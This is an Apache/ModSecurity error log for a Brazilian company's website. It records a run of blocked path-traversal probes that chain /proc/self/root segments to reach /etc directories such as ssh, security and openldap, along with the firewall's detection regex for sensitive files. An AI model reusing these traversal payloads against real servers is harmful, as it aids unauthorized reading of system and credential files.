[Fri Mar 20 05:08:15.683440 2026] [:error] [pid 11167:tid 140411716749056] [client 74.7.241.31:37276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ab_HIg5MgXLBnicPYYgAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:19.355944 2026] [:error] [pid 9818:tid 140411616036608] [client 74.7.241.31:37284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ac11pVZ5mVmJwsFMN2AAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:19.879368 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.241.31:37284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ac11pVZ5mVmJwsFMN2QAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:21.134298 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.241.31:46790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AdfqxLDW4GITHUkTArwAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:23.425688 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.243.128:54908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AdvXLqtnMIWvjpaJ4IwAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 05:08:23.436077 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:46794] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AdjJ3M9BSuKP7CAbwxgAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:23.845852 2026] [mime_magic:error] [pid 31215:tid 140411725141760] (70014)End of file found: [client 57.141.18.105:36750] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:08:25.058876 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.241.31:46804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AeTJ3M9BSuKP7CAbwygAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:27.375308 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.241.31:46806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AexCii7xarUs8iHZEmwAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:28.687716 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.241.31:42256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AfPqxLDW4GITHUkTAuwAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:29.986986 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.241.31:42270] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AfTJ3M9BSuKP7CAbwywAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:31.374933 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:42280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Af9a6ubjKNq_cu4avfQAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:32.726887 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.241.31:42282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AgAF0L0L-SsrnPo5GuwAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:33.995503 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.241.31:42288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AgTJ3M9BSuKP7CAbw0gAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:35.334668 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.241.31:42290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AgxCii7xarUs8iHZEowAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:36.666921 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.241.31:42292] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AhDJ3M9BSuKP7CAbw0wAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:37.957353 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.241.31:45636] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AhfXLqtnMIWvjpaJ4LQAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:41.494027 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.241.31:45652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AiQF0L0L-SsrnPo5GvwAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:42.823521 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.241.31:45668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ail1pVZ5mVmJwsFMN6gAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:44.083264 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.241.31:45670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AjPXLqtnMIWvjpaJ4NAAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:46.595301 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:38660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AjvqxLDW4GITHUkTA0QAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:08:46.653708 2026] [:error] [pid 9818:tid 140411548894976] [client 74.7.241.31:45678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ajl1pVZ5mVmJwsFMN8wAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
